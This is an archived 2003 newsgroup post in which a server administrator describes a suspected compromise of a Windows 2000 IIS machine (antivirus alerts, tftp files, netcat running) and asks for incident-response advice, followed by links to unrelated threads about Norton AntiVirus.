hacktool.iis.exploit

From: pepe (anonymous_at_discussions.microsoft.com)
Date: 11/26/03 

Date: Wed, 26 Nov 2003 07:46:38 -0800

I have a Windows 2000 Server SP4 and patched with all
security updates as of Saturday November 22. IIS is
running on this machine. Monday, received a Norton AV
message that idq.dll was infected with
hacktool.iis.exploit. Subsequently, several other files
(4) were also found to be infected. All were reported to
be quarantined with real-time scan. A couple of them have
the tftpxxx file names. We searched for information at
that time on this particular Trojan and found nothing
anywhere except an item on Symantec that says that it is
covered under their latest definitions. Tuesday, we had an
email application running slow. We found nc.exe (which we
believe to be netcat, port scanning util) running the cpu
pretty hard. We couldn't run a manual scan of NAV because
the local drive was full. It isn't a big drive but it
wasn't full before. We were able to map the local drive of
this computer from another and run a scan from the second
pc to the first and it found two infected files that
Norton left alone. So we took the server offline.

We ran NAV in safe-mode and nothing was reported. We are
also now able to run NAV from Windows and nothing is
reported. This was done with no network connectivity.

We are guessing that after the Trojan infected the
machine, it installed a tftp program and ran netcat. After
that we don't know what else could have happened.

I'm leaving the questions wide open. What would be our
next plan of action? What should we look at to determine
what activity was done?

Thanks for your time.
pepe

Relevant Pages

  • Re: restart after update
    ... that means disabling NAV. ... Windows XP updates I disabled NAV until restarting, ... The next trial test may be to do the restart ... Windows as malware would. ...
    (microsoft.public.windowsupdate)
  • Re: restart after update
    ... Exit the Command Prompt if it remains open by typing exit and pressing Enter and restart now. ... I think Windows saves settings from several previous sessions and I'm wondering if getting to them would work. ... As I mentioned previously, supposedly, NAV 2009 does not have issues allowing file replacement as previous versions of NAV had. ... Does anyone know of "known problems" like this or precautions one should take when updating, e.g. disabling Norton Antivirus, etc.? ...
    (microsoft.public.windowsupdate)
  • Re: Error 0x80072EFD
    ... The issue is with NAV 2004. ... input " Can not do Windows Updates " ... Click the LAN Settings button. ...
    (microsoft.public.windowsupdate)
  • Re: System problems with date set >27 July
    ... to NAV, I ran a check with AntiVir and did an on-line scan at TrendMicro. ... > Then check you system for infestations of viruses, spyware, dialers, key ... >> Not sure if this is a MB problem or a Windows XP problem. ... >> router, some programs would not work, and so on. ...
    (microsoft.public.windowsxp.general)
  • Re: restart after update
    ... Not quite sure what you mean when you refer to 'permanent reboot'. ... As I mentioned previously, supposedly, NAV 2009 does not have issues allowing file replacement as previous versions of NAV had. ... Unless the latest version of NAV is installed, and I'm just going by what Symantec puts out in news releases for it's latest Version of NAV, then it's plain and simple a PITA when it comes to updating Windows with it installed and/or actively monitoring the system. ... Either read the User Guides to completely and totally disable all service and processes of NAV or, use MSConfig and Disable all 3rd party services prior to any attempt to install updates. ...
    (microsoft.public.windowsupdate)
Quantcast